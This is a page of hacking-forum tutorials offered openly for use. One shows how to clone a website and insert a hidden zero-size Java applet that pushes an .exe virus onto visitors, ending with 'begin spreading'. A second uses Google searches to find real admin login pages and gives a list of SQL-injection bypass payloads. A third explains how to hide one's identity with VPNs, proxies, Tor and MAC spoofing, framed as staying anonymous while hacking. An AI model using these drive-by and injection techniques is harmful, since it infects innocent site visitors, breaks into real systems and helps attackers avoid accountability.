How to clone any site and turn it into a Java drive-by

The client.jar file and the applet code is SinlorD's, so all credits for those goes to him.

Download
You'll only need one file, client.jar. The password for the archive is "s!oeV0Estl" (without the quotes).

Is the link dead? Please PM me.

Downloading a web page
Well, obviously we have a web page we want to download. In this example I'll be using http://www.google.com/. Right click anywhere on the page and click "save as". And save it to an empty folder. I'm using Chrome but I know firefox has a similar feature.



Editing the index file
Now open the folder where you saved the file. You'll see you'll have a file and a folder. Rename the file from whatever.htm to index.htm and accept any warning you may get.

Now open up index.htm in notepad. Scroll down to the very bottom of the page, make a new line and add this text:

Code:

<APPLET CODE = "Client.class" ARCHIVE = "Client.jar" WIDTH = "0" HEIGHT = "0">
    <PARAM NAME = "AMLMAFOIEA" VALUE = "YOURVIRUSURL">
</APPLET>

Replace "YOURVIRUSURL" with the link to your .exe virus.



Save and close the file.

Placing the .jar file
Quick step, copy the client.jar you downloaded earlier to the same folder as the index.htm.



That's it! Upload all of the files in the folder (including the folder "whatever_files" and the files you might have inside) to a webhost and begin spreading!

Read More

Hack Admin Account Website[TuT]

 Basic SQL Injection Attack 

For those people who just don't like to read much. I come straight to the point. 

We're gonna hack into an admin account, using SQL injections.

How does it work: A SQL injection injects a code into the MYSQL database which gets passed the site security login.

Step 1: Go to Google, typ in ''admin/login.asp'' and search (You can also use the option, to search only in your country).

Spoiler (Click to Hide)

Step 2: As you already can see in the first picture, we are looking for websites that look like this: example ''google.com/admin/login.asp''. 

Step 3: Go to the website admin login page, typ in:
Username: admin
Password: 1'or'1'='1

Spoiler (Click to Hide)

Well done!! Your now logged in as ADMIN:

Spoiler (Click to Hide)

If it's not working, I've listed other possible injections below. Type these in under ''Password''.

List of injections: 

Spoiler (Click to Hide)

admin'--

1'or'1'='1

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

Note: Websites that record false logins, this is not gonna work on. 

I made it simple as it is guys, no long story's.

Post below, for any questions/suggestions/feedback and enjoy!

Read More

[Tutorial] Stay Anonymous and Secure [Online & Offline] [Updated]

Staying Anonymous

Introduction

Hello guys, 
 I will demonstrate various ways on how to remain anonymous on the Internet. Privacy is a must, in today's world. Currently, there are a lot of crimes going on, such as Swatting, Doxing etc. When our identity gets leaked, it is a big loss for us and it is somewhat one of the big mistakes of our lives. Which is why, staying secure, and anonymous online is essential. 

This tutorial is about two types of protection.

• Online Protection
• Offline Protection

---

First, we should get some offline protection. There are many ways on protecting ourselves. Remember, you should always have offline protection before hacking.

Pro Tip : Never trust anyone on the Internet. There are a lot of bots and individuals that add us on IM services for the sole purpose of infecting us. 

---

Offline Protection

Note : In this part, offline protection refers to protecting your computer from viruses, Trojans, root kits, etc. It may also refer to encryption, such as File Encryption, OS protection, and such. It is very important to protect your files because we can't always trust the ways of Online Anonymity. If it goes wrong, our offline protection should save us. Trojans and viruses remain a great challenge to our Anonymity. There are always Trojans around and if we get infected, the attacker may use our machine as a proxy, and has full control on our machines. 

---

Protect yourself from Malware

Malwarebytes' Anti-Malware

Malwarebytes' Anti-Malware (MBAM) is a computer application that finds and removes malware. Made by Malwarebytes Corporation

More and download

---

Encrypt your Keystrokes using KeyScrambler

KeyScrambler

KeyScrambler is an anti-keylogging program designed specifically to strengthen your PC security.

More and download

---

Get a Firewall

COMODO firewall

It is always recommended to use a Firewall when doing hacking. I recommend Comodo Firewall. COMODO firewall is Award-Winning personal firewall software on Internet.

Download here

---

Protect your files and OS using True Crypt.

TrueCrypt

TrueCrypt is a free open-source disk encryption software for Windows 7/Vista/XP, Mac OS X, and Linux.

Source and more: http://www.truecrypt.org/

Download here

---

Use Virtual Machines for hacking (VMWare Player)

VMWare Player

It is always a good idea on hacking from a VM (Virtual Machine) because if anything goes wrong just delete it using a good file eraser.

Source and more : https://www.vmware.com/products/desktop_...rview.html

Download Here

---

Deepfreeze your PC to prevent common attacks

DeepFreeze

Faronics Deep Freeze makes your PC indestructible. It protects your computer by freezing its original configuration, which prevents unwelcome or unwanted changes made while in-session from sticking. With a simple restore-to-reboot, your system integrity is maintained helping your machines to run smoothly and efficiently giving you more up-time and boosting user productivity.

Source and more : http://www.faronics.com/en-uk/enterprise...e_en-uk-2/

Download Here

---

Spoof your Mac Address using TMAC

TMAC

Technitium MAC Address Changer allows you to change (spoof) Media Access Control (MAC) Address of your Network Interface Card (NIC) irrespective to your NIC manufacturer or its driver. It has a very simple user interface and provides ample information regarding each NIC in the machine.

Source and more : http://www.technitium.com/tmac/index.html

Download here

---

Use CCleaner, the multi-purpose tool

CCleaner

Cleaner is a multi-purpose tool which can be used for deleting files, clearing temp files, cache, etc.

Source and more : http://www.piriform.com/ccleaner/

Download here

---

Clear the evil cookies

Flash Cookie Remover

Flash cookies are evil because they persist even if you delete your browser's cookies. They are stored separately from normal site cookies and therefore need a special tool to delete them.

Source and more : http://www.trojanhunter.com/flash-cookie-remover/

Download here

---

Other tips : Don't think that using Linux or Mac can't get you viruses. There are also malware that works on this Operating Systems. Malware programmers don't feel the need to write malware for this OSs since they are not used by many people.

---

Online Protection

Now we are moving to Online Protection. As you know, this is very important also more than Offline Protection. Common methods of Online protection are discussed below.

---

Types of Online Protection

• VPN(s)
• Proxies
• Tor
• SSH Tunneling

---

VPN (Virtual Private Network)

A virtual private network (VPN) is a network that uses primarily public telecommunication infrastructure, such as the Internet, to provide remote offices or traveling users access to a central organizational network.

VPN provides us a secure way of connecting to websites by hiding our IP and encrypting our information.

Source and more : http://en.wikipedia.org/wiki/Virtual_private_network

---

Free VPNs

• Cyberghost
• HotSpot Shield
• Pro XPN
• Open VPN

---

Paid VPNs

• nVPN
• SwissVPN

---

HTTP Proxies and SOCKS5

Get Proxy lists from this sites.

• Alive Proxy
• Hide My Ass
• Proxy list

More here.

Pro-Tip : Don't use HideMyAss for hacking.

You can also get Proxies from HF, here.

---

For Premium and Private SOCKS5, you can search Google. Because the sites I use get down constantly.

---

Some Proxy sites

Click to see (Click to Hide)

http://www.ninjacloak.com
http://www.hidemyass.com
http://go-between.me
http://ir2.me
http://rapidsurf.info
http://go-between.me
http://ir2.me
http://rapidsurf.info
http://yourownproxy.info
http://proxy.co.cc
http://iknownothing.org
http://accessyouth.info
http://buwk.com
http://UnblockFree.net
http://hillofbeans.biz
http://aptunnel.com
http://goaheadmakemyday.org
http://lameproxy.info
http://centerfoldproxy.info
http://proxylist.co
http://sneaky9.com
http://freesurfproxy.com
http://goflyakite.org
http://fastieproxy.com
http://ihaveacunningplan.info
http://schoolfreezone.com
http://proxify.net
http://passmethru.com
http://proxy2use.com
http://0001.cz.cc

Credits : iMario

---

Use Tor for secure browsing

Tor

Tor is free software and an open network that helps you defend against a form of network surveillance that threatens personal freedom and privacy, confidential business activities and relationships, and state security known as traffic analysis

Source and more : https://www.torproject.org/about/overview.html.en

---

SSH Tunneling

Things you will need for SSH Tunneling

• PuTTy
• Firefox (Preferred)

Steps of Tunneling

1. Open PuTTY
2. Enter your IP on the Hostname or IP Address text box
3. To find your IP, you can use Command Prompt. Just type ipconfig and click Enter.
4. Now to the left of PuTTy, you will see a list.
5. Click the '+' symbol of SSH.
6. From the drop down, click Tunnels
7. You need to input a port and the click "Dynamic".
8. Now click Add and open the connection. You will be connected.
9. Now in your browser proxy settings, type 127.0.0.1 for IP and the selected port for port.
10. That's it. It is done!!

---

Conclusion

It is a proven fact that nobody can be fully anonymous on the Internet. However, that does not mean nobody is secure. We should take steps to protect ourselves in the World Wide Web. Daily, a large amount of Cyber Crimes occurs and Identity theft is one of them. Black Hats ruin peoples' lives for personal gain. It is our duty to remain secure. I sincerely hope this guide helped you.

Regards,

Read More